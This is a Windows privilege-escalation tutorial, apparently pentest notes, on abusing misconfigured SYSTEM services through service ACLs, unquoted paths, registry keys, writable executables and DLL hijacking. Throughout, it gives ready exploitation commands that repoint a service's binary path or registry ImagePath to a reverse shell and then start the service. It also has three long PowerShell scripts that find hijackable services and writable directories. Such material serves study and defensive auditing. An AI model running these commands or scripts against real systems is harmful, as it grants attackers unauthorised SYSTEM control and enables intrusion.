Service Exploits

If a service runs as SYSTEM (LocalSystem) and is misconfigured, exploiting it can give command execution as SYSTEM as well.

Service Commands

# Query the configuration of a service (binary path, start type, account it runs as)
# In PowerShell use sc.exe rather than sc, which is an alias for Set-Content
sc.exe qc <name>

# Query the current status of a service
sc.exe query <name>

# Modify a configuration option of a service (the space after "=" is required)
sc.exe config <name> <option>= <value>

# Start/stop a service
net start <name>
net stop <name>

Service Misconfigurations

Insecure Service Permissions

Each service has an ACL (security descriptor) that defines service-specific permissions. The ones that matter:

# Innocuous service permissions
SERVICE_QUERY_CONFIG
SERVICE_QUERY_STATUS

# Useful service permissions: tell whether the user can start or stop the service
SERVICE_STOP
SERVICE_START

# Dangerous service permissions
SERVICE_CHANGE_CONFIG
SERVICE_ALL_ACCESS
  • If the user can change the configuration of a service that runs as SYSTEM, replace its executable path with our own binary.

  • We also need to be able to start (or stop and restart) the service. Without SERVICE_START the new binary only runs the next time the service starts, e.g. after a reboot for an auto-start service.

  • Check the ACL of a service (-c = service, -w = show write access only, -u/-q = suppress errors and banner, -v = verbose):

.\accesschk.exe /accepteula -uwcqv <user> <service>
  • Change binary path of a service

sc.exe config <service> binpath= "\"C:\reverse_shell.exe\""

# start service to start the reverse shell
net start <service>
  • Using PowerShell to enumerate service binary paths and the account each service runs as

Get-WmiObject -Class win32_service | Select-Object Name, PathName, StartName
  • PowerUp can be used to query services whose binpath can be modified by the current user:

Get-ModifiableServiceFile -Verbose
  • PowerUp can be used to query services whose configuration can be changed by the current user:

Get-ModifiableService -Verbose
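The following PowerShell is an added example, not code from the original page or from PowerUp: it decodes each service's DACL with sc.exe sdshow and .NET's RawSecurityDescriptor, compares the ACEs against the SIDs in the current token (user plus groups), and lists the LocalSystem services whose configuration the user can change, together with whether the user can also start and stop them. It needs only built-in tools. The variable and function names are this example's own, and the allow/deny evaluation is simplified (a matching deny ACE always wins, regardless of ACE order).

```powershell
# Service access-mask bits from winsvc.h
$SERVICE_CHANGE_CONFIG = 0x0002
$SERVICE_START         = 0x0010
$SERVICE_STOP          = 0x0020
$GENERIC_WRITE         = 0x40000000
$GENERIC_ALL           = 0x10000000

# SIDs the current token carries: the user plus every enabled group
$ident  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$MySids = @($ident.User.Value) + @($ident.Groups | ForEach-Object { $_.Value })

function Get-ServiceAccess {
    param([Parameter(Mandatory)][string]$Name)
    # 'sc.exe sdshow' prints the service security descriptor as SDDL, e.g.
    # D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)...
    $sddl = sc.exe sdshow $Name 2>$null | Where-Object { $_ -match '^D:' } | Select-Object -First 1
    if (-not $sddl) { return $null }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)

    $allow = 0; $deny = 0
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
        if ($MySids -notcontains $ace.SecurityIdentifier.Value) { continue }
        switch ($ace.AceType) {
            'AccessAllowed' { $allow = $allow -bor $ace.AccessMask }
            'AccessDenied'  { $deny  = $deny  -bor $ace.AccessMask }
        }
    }
    # Simplification: a denied bit wins regardless of where the ACE sits in the DACL
    $eff = $allow -band (-bnot $deny)
    if ($eff -band $GENERIC_ALL)   { $eff = $eff -bor $SERVICE_CHANGE_CONFIG -bor $SERVICE_START -bor $SERVICE_STOP }
    if ($eff -band $GENERIC_WRITE) { $eff = $eff -bor $SERVICE_CHANGE_CONFIG }

    [PSCustomObject]@{
        Service      = $Name
        ChangeConfig = [bool]($eff -band $SERVICE_CHANGE_CONFIG)
        Start        = [bool]($eff -band $SERVICE_START)
        Stop         = [bool]($eff -band $SERVICE_STOP)
    }
}

# LocalSystem services whose binary path we can rewrite. 'Start' says whether we can
# trigger the new binary ourselves; if not, an Auto service runs it after a reboot.
Get-CimInstance Win32_Service |
    Where-Object { $_.StartName -eq 'LocalSystem' } |
    ForEach-Object {
        $a = Get-ServiceAccess -Name $_.Name
        if ($a -and $a.ChangeConfig) {
            $a | Add-Member -NotePropertyName StartMode -NotePropertyValue $_.StartMode -PassThru
        }
    } |
    Format-Table -AutoSize

# Exploitation then follows the page:
#   sc.exe config <service> binpath= "\"C:\reverse_shell.exe\""
#   net start <service>
```

Run it as the low-privileged user whose token you want to evaluate; the SDDL parsing does not need any rights beyond SERVICE_QUERY_CONFIG/READ_CONTROL, which most services grant to everyone. The same DACL decoding is what accesschk -c does, so use accesschk when it is available and this script when only built-ins can be dropped on the box.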

Unquoted Service Path

# Quoted: runs SomeProgram.exe
"C:\Program Files\Some Dir\SomeProgram.exe"

# Unquoted: ambiguous. Is the executable "C:\Program" with the arguments
# "Files\Some" and "Dir\SomeProgram.exe", or is it the full path?
C:\Program Files\Some Dir\SomeProgram.exe
# Windows resolves the ambiguity by trying each possibility in turn,
# appending .exe where it is missing. Execution order:
# 1. "C:\Program.exe"
# 2. "C:\Program Files\Some.exe"
# 3. "C:\Program Files\Some Dir\SomeProgram.exe"
  • If we can write to one of the directories searched before the real executable, we can drop a binary with the expected name there and the service runs it instead. This only helps when the service runs as a privileged account, and by default standard users cannot write to C:\ or C:\Program Files\; the usual hit is a vendor directory with weak permissions.

  • To check write access for each of these directories (-d = directories):

.\accesschk.exe /accepteula -uwdqv "C:\"
.\accesschk.exe /accepteula -uwdqv "C:\Program Files\"
# ... and so on for each directory in the path
  • After a writable directory is found, copy the reverse shell there under the name Windows will try first, then start the service.

# e.g. copy the reverse shell to "C:\Program Files\Some.exe"
net start <service>
  • We get a reverse shell when the service starts. If we cannot start it ourselves, an auto-start service runs the payload after a reboot.

  • PowerUp script can be used to search for unquoted service paths:

Get-ServiceUnquoted -Verbose

Weak Registry Permission

  • The configuration of each service is stored in the registry under HKLM\SYSTEM\CurrentControlSet\Services\<name>; ImagePath holds the executable and ObjectName the account the service runs as.

  • Registry keys have their own ACLs, independent of the service ACL.

  • If the key's ACL is misconfigured, it may be possible to change the service configuration via the registry even without SERVICE_CHANGE_CONFIG on the service itself.

# Verify writable registry keys (look for Set Value / Full Control granted to our user or a group we are in)
Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Select-Object -Property *

# Verify writability via accesschk (-k = registry key)
.\accesschk.exe /accepteula -uvwqk <user> HKLM\System\CurrentControlSet\Services\regsvc
# Query the registry key (confirm ObjectName is LocalSystem)
reg query HKLM\System\CurrentControlSet\Services\regsvc

# Overwrite the executable path
reg add HKLM\System\CurrentControlSet\Services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\reverse_shell.exe /f

# Restart the service (we still need SERVICE_START, or a reboot for an auto-start service)
net start regsvc

Insecure Service Executable

If the service's executable itself is writable by our user, replace it with our payload. Check the file path with accesschk -w as for the directories above; keep a copy of the original, and stop the service first if it is running, because the image is locked while it runs.

# Overwrite the service executable with our reverse shell, then start the service
net start <service>
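Added example (not code from the original page) covering both the Weak Registry Permission and Insecure Service Executable checks: the same access-rule walk works for a service's registry key and for its executable, because file and registry ACLs both expose GetAccessRules(). It compares every ACE against the current token's SIDs and reports services whose key grants Set Value, or whose binary grants WriteData or Delete. The function and variable names are this example's own; generic rights (GENERIC_WRITE and friends) in ACEs are not expanded, which is one reason to confirm hits with accesschk.

```powershell
$ident  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$MySids = @($ident.User.Value) + @($ident.Groups | ForEach-Object { $_.Value })

# Rights that let us change what the service runs: SetValue (0x2) on the key,
# WriteData (0x2) or Delete (0x10000) on the file. Modify and FullControl include them.
$REG_WRITE  = 0x00002
$FILE_WRITE = 0x10002

function Test-WriteGranted {
    param([string]$Path, [int]$WriteMask)
    # Asking GetAccessRules for SecurityIdentifier avoids SID-to-name lookups.
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }   # no READ_CONTROL on the object, or it does not exist
    $allow = 0; $deny = 0
    foreach ($rule in $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
        if ($MySids -notcontains $rule.IdentityReference.Value) { continue }
        $rights = if ($rule -is [System.Security.AccessControl.RegistryAccessRule]) { [int]$rule.RegistryRights } else { [int]$rule.FileSystemRights }
        if ($rule.AccessControlType -eq 'Allow') { $allow = $allow -bor $rights } else { $deny = $deny -bor $rights }
    }
    return (($allow -band $WriteMask) -ne 0) -and (($deny -band $WriteMask) -eq 0)
}

Get-CimInstance Win32_Service | ForEach-Object {
    $svc = $_
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
    # Executable path without surrounding quotes or trailing arguments
    $exe = $null
    if     ($svc.PathName -match '^"([^"]+)"')  { $exe = $Matches[1] }
    elseif ($svc.PathName -match '^(.*?\.exe)') { $exe = $Matches[1] }
    [PSCustomObject]@{
        Service     = $svc.Name
        RunsAs      = $svc.StartName
        KeyWritable = Test-WriteGranted -Path $key -WriteMask $REG_WRITE
        ExeWritable = [bool]($exe -and (Test-Path -LiteralPath $exe) -and (Test-WriteGranted -Path $exe -WriteMask $FILE_WRITE))
    }
} | Where-Object { $_.KeyWritable -or $_.ExeWritable } | Format-Table -AutoSize

# KeyWritable: reg add HKLM\SYSTEM\CurrentControlSet\Services\<service> /v ImagePath /t REG_EXPAND_SZ /d C:\reverse_shell.exe /f
# ExeWritable: net stop <service>, back up and overwrite the binary, net start <service>
```

A hit on ExeWritable for a service that is currently running still needs SERVICE_STOP (or a reboot window) before the file can be replaced, since the mapped image cannot be opened for write; the registry route has no such constraint but still needs the service to (re)start.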

DLL Hijacking

  • A service executable loads a DLL that is missing from the system (or is only found late in the DLL search order).

  • Our user has write permission on a directory that Windows searches for that DLL (the executable's own directory first, then the system directories, then the entries in PATH).

  • The DLL runs with the same privileges as the process that loads it, so a planted DLL in a SYSTEM service runs as SYSTEM.

# Find services we can stop and start (the payload only runs when the service (re)starts)
# Copy the service executable to our own machine
# Run it under procmon64 and filter for NAME NOT FOUND results on .dll paths to see which DLLs are missing and where they are looked for
# Check whether one of those directories is writable
# Build a DLL whose DllMain runs the reverse shell and place it there under the missing DLL's name
net start <service>
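The following PowerShell is an added example serving both the Unquoted Service Path and DLL Hijacking sections; it is not code from the original page or from PowerUp. For every service it derives the executable path, builds the truncated candidates CreateProcess tries when the path is unquoted, and probes whether the current user can write to each candidate's directory; it also probes the executable's own directory (the first DLL search location) and, once, the PATH entries (the last). Writability is tested by actually creating and removing a zero-byte file, which reflects the token's effective access without decoding ACLs. The function names are this example's own; the working directory a service starts in is not included in the search locations.

```powershell
function Test-DirectoryWritable {
    param([string]$Directory)
    # Probe by creating a zero-byte file; this captures inheritance, group membership
    # and deny ACEs exactly as the kernel evaluates them for our token.
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $probe = Join-Path $Directory ([System.IO.Path]::GetRandomFileName())
    try { [System.IO.File]::WriteAllText($probe, '') } catch { return $false }
    Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
    return $true
}

function Get-ServiceExe {
    param([string]$PathName)
    # Executable path without surrounding quotes or trailing arguments
    if ($PathName -match '^"([^"]+)"')  { return @{ Exe = $Matches[1]; Quoted = $true } }
    if ($PathName -match '^(.*?\.exe)') { return @{ Exe = $Matches[1]; Quoted = $false } }
    return $null
}

function Get-UnquotedCandidates {
    param([string]$Exe)
    # Paths CreateProcess tries before the full one. For
    # C:\Program Files\Some Dir\SomeProgram.exe these are
    # C:\Program.exe and C:\Program Files\Some.exe
    $parts = $Exe -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) { ($parts[0..($i - 1)] -join ' ') + '.exe' }
}

$results = Get-CimInstance Win32_Service | ForEach-Object {
    $svc  = $_
    $info = Get-ServiceExe $svc.PathName
    if (-not $info) { return }
    $findings = @()
    # Unquoted path with spaces: a writable directory on the way lets us plant <prefix>.exe
    if (-not $info.Quoted -and $info.Exe -match ' ') {
        foreach ($c in Get-UnquotedCandidates $info.Exe) {
            if (Test-DirectoryWritable (Split-Path -Parent $c)) { $findings += "unquoted path: plant $c" }
        }
    }
    # DLL hijack: the exe's own directory is searched first for every DLL it loads
    $dir = Split-Path -Parent $info.Exe
    if (Test-DirectoryWritable $dir) { $findings += "exe directory writable (first DLL search location): $dir" }
    foreach ($f in $findings) {
        [PSCustomObject]@{ Service = $svc.Name; RunsAs = $svc.StartName; StartMode = $svc.StartMode; Finding = $f }
    }
}
$results | Format-Table -AutoSize

# PATH entries are searched last, so they only matter for a DLL that is missing
# everywhere else; a writable one affects every service that loads such a DLL.
$env:PATH -split ';' | Where-Object { $_ -and (Test-DirectoryWritable $_) } |
    ForEach-Object { "writable PATH entry (last DLL search location): $_" }
```

Prioritise findings where RunsAs is LocalSystem and either we hold SERVICE_START on the service or StartMode is Auto; a writable exe directory still needs procmon64 (or a look at the import table) to tell which DLL name to use, because the directory only wins for DLLs that are not already satisfied from system32 or the KnownDLLs list.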
